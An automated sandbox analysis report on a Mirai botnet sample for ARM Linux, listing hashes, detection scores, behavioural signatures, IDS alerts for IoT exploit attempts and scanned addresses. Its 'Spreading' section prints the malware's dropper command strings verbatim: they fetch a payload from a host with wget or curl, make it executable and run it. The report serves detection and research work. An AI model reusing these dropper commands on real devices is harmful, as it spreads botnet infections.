Linux Analysis Report
ZFvtIZszMd

Overview

General Information

Sample Name: ZFvtIZszMd
Analysis ID: 557423
MD5: ddba92dcf5c5fd7b791f6278a3e20fb8
SHA1: 635075a22cd4e3ade3583d4e9787a09b06e50b76
SHA256: bc08d8a3541834634fa5fd606805ee6e24cd07575af27bbcbb8ad02247cccd38
Tags: 32, arm, elf, mirai
Infos:

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Found strings indicative of a multi-platform dropper
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample contains strings that are potentially command strings
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

Source: ZFvtIZszMd Virustotal: Detection: 66%
Source: ZFvtIZszMd Metadefender: Detection: 48%
Source: ZFvtIZszMd ReversingLabs: Detection: 60%

Spreading

Source: /tmp/ZFvtIZszMd (PID: 5260) Opens: /proc/net/route
Source: ZFvtIZszMd String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: ZFvtIZszMd String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: ZFvtIZszMd String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.30.dr String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.30.dr String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: networks.30.dr String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Networking

Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42764 -> 187.157.44.71:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42764 -> 187.157.44.71:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44958 -> 161.71.2.41:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44958 -> 161.71.2.41:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:57962 -> 52.48.108.30:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33030 -> 45.8.220.39:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33030 -> 45.8.220.39:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48916 -> 207.154.230.111:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58348 -> 52.232.110.39:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58348 -> 52.232.110.39:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:42558 -> 18.66.0.94:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:53338 -> 185.199.110.112:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50360 -> 114.207.251.137:8080
Source: Traffic Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:52454 -> 92.118.26.58:81
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 180.188.249.27:6776 -> 192.168.2.23:15453
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.213.248:51492 -> 192.168.2.23:15453
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 88.129.242.254:6231 -> 192.168.2.23:15453
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 201.150.176.65:4000 -> 192.168.2.23:15453
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 122.155.0.70:8083 -> 192.168.2.23:15453
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.93:58568 -> 192.168.2.23:15453
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:44758 -> 195.54.163.58:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:44758 -> 195.54.163.58:8080
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50434 -> 172.247.38.144:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:46296 -> 52.73.33.104:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:34978 -> 98.156.8.112:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:34978 -> 98.156.8.112:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59926 -> 83.142.198.185:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59926 -> 83.142.198.185:80
Source: Traffic Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46902 -> 192.186.22.190:5555
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45500 -> 185.196.100.153:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45500 -> 185.196.100.153:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48868 -> 23.12.89.25:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48868 -> 23.12.89.25:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.89.25:80 -> 192.168.2.23:48868
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59780 -> 35.173.167.250:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:45038 -> 104.15.240.53:80
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49312 -> 50.16.188.25:8080
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:47290 -> 52.29.6.66:8080
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32802 -> 184.25.176.127:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32802 -> 184.25.176.127:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.25.176.127:80 -> 192.168.2.23:32802
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:34974 -> 13.125.149.49:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40888 -> 185.133.229.74:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.34.61:80 -> 192.168.2.23:39122
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:39122 -> 23.208.34.61:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49458 -> 23.230.254.105:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:33740 -> 190.166.198.45:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:35218 -> 3.20.201.243:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36392 -> 200.123.205.169:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36392 -> 200.123.205.169:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.101.170.129:80 -> 192.168.2.23:48328
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55072 -> 34.98.66.83:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55072 -> 34.98.66.83:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:32900 -> 118.163.113.176:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:47072 -> 52.72.158.238:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:48156 -> 143.204.112.212:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41860 -> 13.238.47.38:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41860 -> 13.238.47.38:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50568 -> 210.48.20.7:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50568 -> 210.48.20.7:80
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58468 -> 24.8.179.115:8080
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48184 -> 54.84.181.34:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.233.170:80 -> 192.168.2.23:60644
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49404 -> 42.98.215.127:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49404 -> 42.98.215.127:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55652 -> 45.144.3.201:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55652 -> 45.144.3.201:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:49182 -> 185.233.83.88:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:56410 -> 178.135.100.61:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:56410 -> 178.135.100.61:8080
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:49116 -> 149.104.79.70:8080
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:38106 -> 2.178.219.63:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:60644 -> 23.208.233.170:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:45792 -> 52.4.18.169:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48328 -> 104.101.170.129:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:48818 -> 64.34.159.178:80
Source: global traffic TCP traffic: 192.168.2.23:59156 -> 37.192.134.201:8080
Source: global traffic TCP traffic: 192.168.2.23:53758 -> 177.2.102.121:8443
Source: global traffic TCP traffic: 192.168.2.23:43908 -> 132.128.81.209:8080
Source: global traffic TCP traffic: 192.168.2.23:42302 -> 205.128.172.162:5555
Source: global traffic TCP traffic: 192.168.2.23:36700 -> 198.245.112.146:52869
Source: global traffic TCP traffic: 192.168.2.23:53144 -> 78.253.124.85:7574
Source: global traffic TCP traffic: 192.168.2.23:47820 -> 149.236.45.199:7574
Source: global traffic TCP traffic: 192.168.2.23:34936 -> 156.146.166.141:8443
Source: global traffic TCP traffic: 192.168.2.23:36452 -> 216.116.152.230:5555
Source: global traffic TCP traffic: 192.168.2.23:56486 -> 166.250.236.222:5555
Source: global traffic TCP traffic: 192.168.2.23:40030 -> 130.173.40.235:49152
Source: global traffic TCP traffic: 192.168.2.23:48268 -> 19.104.90.193:37215
Source: global traffic TCP traffic: 192.168.2.23:60956 -> 149.239.226.86:5555
Source: global traffic TCP traffic: 192.168.2.23:37686 -> 130.128.52.30:7574
Source: global traffic TCP traffic: 192.168.2.23:48838 -> 200.6.70.174:7574
Source: global traffic TCP traffic: 192.168.2.23:50900 -> 178.179.22.112:5555
Source: global traffic TCP traffic: 192.168.2.23:54014 -> 194.105.25.217:49152
Source: global traffic TCP traffic: 192.168.2.23:33322 -> 55.108.83.106:8080
Source: global traffic TCP traffic: 192.168.2.23:57370 -> 41.177.12.142:81
Source: global traffic TCP traffic: 192.168.2.23:56058 -> 210.214.189.209:8443
Source: global traffic TCP traffic: 192.168.2.23:56656 -> 194.15.167.91:7574
Source: global traffic TCP traffic: 192.168.2.23:54374 -> 190.235.119.78:49152
Source: global traffic TCP traffic: 192.168.2.23:54304 -> 159.31.6.223:81
Source: global traffic TCP traffic: 192.168.2.23:40030 -> 181.229.62.241:8080
Source: global traffic TCP traffic: 192.168.2.23:42826 -> 213.73.187.25:8443
Source: global traffic TCP traffic: 192.168.2.23:43316 -> 43.159.190.154:37215
Source: global traffic TCP traffic: 192.168.2.23:56400 -> 188.186.154.240:8443
Source: global traffic TCP traffic: 192.168.2.23:36350 -> 61.118.95.130:5555
Source: global traffic TCP traffic: 192.168.2.23:44496 -> 42.0.142.75:81
Source: global traffic TCP traffic: 192.168.2.23:53900 -> 8.80.7.243:8080
Source: global traffic TCP traffic: 192.168.2.23:43846 -> 217.47.139.128:7574
Source: global traffic TCP traffic: 192.168.2.23:54718 -> 81.126.102.249:81
Source: global traffic TCP traffic: 192.168.2.23:44058 -> 209.100.212.31:8080
Source: global traffic TCP traffic: 192.168.2.23:46060 -> 160.246.43.49:81
Source: global traffic TCP traffic: 192.168.2.23:44152 -> 208.220.131.137:52869
Source: global traffic TCP traffic: 192.168.2.23:37958 -> 129.88.172.101:8080
Source: global traffic TCP traffic: 192.168.2.23:33562 -> 190.36.150.101:49152
Source: global traffic TCP traffic: 192.168.2.23:43358 -> 212.73.87.107:8080
Source: global traffic TCP traffic: 192.168.2.23:45292 -> 183.123.30.3:37215
Source: global traffic TCP traffic: 192.168.2.23:55036 -> 214.222.104.45:37215
Source: global traffic TCP traffic: 192.168.2.23:53776 -> 47.135.217.171:81
Source: global traffic TCP traffic: 192.168.2.23:36064 -> 9.31.180.218:52869
Source: global traffic TCP traffic: 192.168.2.23:48898 -> 63.68.28.146:37215
Source: global traffic TCP traffic: 192.168.2.23:52826 -> 204.46.18.242:49152
Source: global traffic TCP traffic: 192.168.2.23:56830 -> 153.49.245.107:8443
Source: global traffic TCP traffic: 192.168.2.23:36634 -> 167.88.193.6:8080
Source: global traffic TCP traffic: 192.168.2.23:52812 -> 210.73.128.203:8080
Source: global traffic TCP traffic: 192.168.2.23:35954 -> 214.223.72.186:49152
Source: global traffic TCP traffic: 192.168.2.23:50076 -> 118.198.37.98:7574
Source: global traffic TCP traffic: 192.168.2.23:52152 -> 164.113.140.76:49152
Source: global traffic TCP traffic: 192.168.2.23:56716 -> 157.219.143.152:52869
Source: global traffic TCP traffic: 192.168.2.23:38844 -> 210.67.192.146:49152
Source: global traffic TCP traffic: 192.168.2.23:46812 -> 104.219.63.182:37215
Source: global traffic TCP traffic: 192.168.2.23:51852 -> 133.47.164.71:7574
Source: global traffic TCP traffic: 192.168.2.23:38548 -> 73.87.35.147:49152
Source: global traffic TCP traffic: 192.168.2.23:49718 -> 158.33.63.127:81
Source: global traffic TCP traffic: 192.168.2.23:34656 -> 102.83.23.37:81
Source: global traffic TCP traffic: 192.168.2.23:60726 -> 135.17.36.146:8080
Source: global traffic TCP traffic: 192.168.2.23:47698 -> 53.204.101.143:8080
Source: global traffic TCP traffic: 192.168.2.23:47096 -> 150.228.174.178:49152
Source: global traffic TCP traffic: 192.168.2.23:50036 -> 43.193.195.75:8443
Source: global traffic TCP traffic: 192.168.2.23:46028 -> 112.196.203.8:7574
Source: global traffic TCP traffic: 192.168.2.23:57330 -> 115.174.174.105:8080
Source: global traffic TCP traffic: 192.168.2.23:46866 -> 149.192.98.226:8443
Source: global traffic TCP traffic: 192.168.2.23:42076 -> 163.125.119.193:37215
Source: global traffic TCP traffic: 192.168.2.23:41602 -> 40.250.29.252:52869
Source: global traffic TCP traffic: 192.168.2.23:52770 -> 116.182.89.143:49152
Source: global traffic TCP traffic: 192.168.2.23:39704 -> 155.62.151.67:8080
Source: global traffic TCP traffic: 192.168.2.23:58638 -> 139.157.78.58:5555
Source: global traffic TCP traffic: 192.168.2.23:55622 -> 41.2.112.206:81
Source: global traffic TCP traffic: 192.168.2.23:36804 -> 204.143.178.79:8080
Source: global traffic TCP traffic: 192.168.2.23:57380 -> 88.80.204.55:37215
Source: global traffic TCP traffic: 192.168.2.23:39708 -> 207.53.13.164:8080
Source: global traffic TCP traffic: 192.168.2.23:43474 -> 188.172.6.140:5555
Source: global traffic TCP traffic: 192.168.2.23:43864 -> 157.231.237.220:8080
Source: global traffic TCP traffic: 192.168.2.23:60768 -> 106.50.41.89:5555
Source: global traffic TCP traffic: 192.168.2.23:52376 -> 55.28.208.249:5555
Source: global traffic TCP traffic: 192.168.2.23:42828 -> 52.68.173.169:52869
Source: global traffic TCP traffic: 192.168.2.23:48650 -> 168.240.219.165:37215
Source: global traffic TCP traffic: 192.168.2.23:56096 -> 96.172.77.169:7574
Source: global traffic TCP traffic: 192.168.2.23:58178 -> 100.166.231.212:8080
Source: global traffic TCP traffic: 192.168.2.23:41254 -> 33.167.116.217:8443
Source: global traffic TCP traffic: 192.168.2.23:47110 -> 149.209.199.38:49152
Source: global traffic TCP traffic: 192.168.2.23:42404 -> 135.15.153.186:49152
Source: global traffic TCP traffic: 192.168.2.23:45672 -> 212.66.31.87:8080
Source: global traffic TCP traffic: 192.168.2.23:41590 -> 48.68.104.252:8080
Source: global traffic TCP traffic: 192.168.2.23:41078 -> 84.231.13.28:52869
Source: global traffic TCP traffic: 192.168.2.23:46832 -> 48.109.59.80:8080
Source: global traffic TCP traffic: 192.168.2.23:58590 -> 64.158.29.64:7574
Source: global traffic TCP traffic: 192.168.2.23:45014 -> 204.162.246.215:5555
Source: global traffic TCP traffic: 192.168.2.23:36440 -> 115.234.87.185:81
Source: global traffic TCP traffic: 192.168.2.23:41900 -> 215.85.193.237:7574
Source: global traffic TCP traffic: 192.168.2.23:38396 -> 173.181.211.215:52869
Source: global traffic TCP traffic: 192.168.2.23:44708 -> 194.225.60.42:81
Source: global traffic TCP traffic: 192.168.2.23:49582 -> 161.39.161.182:5555
Source: global traffic TCP traffic: 192.168.2.23:41984 -> 209.59.13.236:52869
Source: global traffic TCP traffic: 192.168.2.23:37790 -> 19.155.129.207:81
Source: global traffic TCP traffic: 192.168.2.23:60320 -> 160.108.162.20:8080
Source: global traffic TCP traffic: 192.168.2.23:36568 -> 151.186.78.35:8080
Source: global traffic TCP traffic: 192.168.2.23:60780 -> 124.167.196.122:8080
Source: global traffic TCP traffic: 192.168.2.23:41078 -> 98.1.76.193:49152
Source: global traffic TCP traffic: 192.168.2.23:54984 -> 55.79.65.76:8080
Source: global traffic TCP traffic: 192.168.2.23:48952 -> 37.201.208.112:52869
Source: global traffic TCP traffic: 192.168.2.23:49900 -> 54.181.148.41:37215
Source: global traffic TCP traffic: 192.168.2.23:58284 -> 155.60.202.215:81
Source: global traffic TCP traffic: 192.168.2.23:56762 -> 60.225.44.235:8080
Source: global traffic TCP traffic: 192.168.2.23:46386 -> 146.118.139.85:52869
Source: global traffic TCP traffic: 192.168.2.23:36224 -> 170.36.217.232:8080
Source: global traffic TCP traffic: 192.168.2.23:59392 -> 45.238.205.88:49152
Source: global traffic TCP traffic: 192.168.2.23:44794 -> 147.44.226.197:7574
Source: global traffic TCP traffic: 192.168.2.23:60304 -> 4.141.143.218:52869
Source: global traffic TCP traffic: 192.168.2.23:52358 -> 104.13.41.226:8443
Source: global traffic TCP traffic: 192.168.2.23:42148 -> 185.144.122.203:8080
Source: global traffic TCP traffic: 192.168.2.23:48504 -> 28.55.198.211:8080
Source: global traffic TCP traffic: 192.168.2.23:53422 -> 155.59.7.53:8080
Source: global traffic TCP traffic: 192.168.2.23:53158 -> 58.196.43.144:8443
Source: global traffic TCP traffic: 192.168.2.23:44610 -> 73.225.131.194:81
Source: global traffic TCP traffic: 192.168.2.23:41882 -> 116.64.200.219:8443
Source: global traffic TCP traffic: 192.168.2.23:45180 -> 53.170.157.130:37215
Source: global traffic TCP traffic: 192.168.2.23:35318 -> 198.231.208.0:8080
Source: global traffic TCP traffic: 192.168.2.23:46948 -> 191.56.23.113:8080
Source: global traffic TCP traffic: 192.168.2.23:36530 -> 175.52.69.37:52869
Source: global traffic TCP traffic: 192.168.2.23:56396 -> 134.123.74.190:8443
Source: global traffic TCP traffic: 192.168.2.23:48810 -> 44.223.229.177:8443
Source: global traffic TCP traffic: 192.168.2.23:51608 -> 168.226.69.113:81
Source: global traffic TCP traffic: 192.168.2.23:34624 -> 209.37.239.53:8080
Source: global traffic TCP traffic: 192.168.2.23:52358 -> 69.235.123.21:49152
Source: global traffic TCP traffic: 192.168.2.23:59252 -> 147.190.48.24:7574
Source: global traffic TCP traffic: 192.168.2.23:41124 -> 142.44.76.228:7574
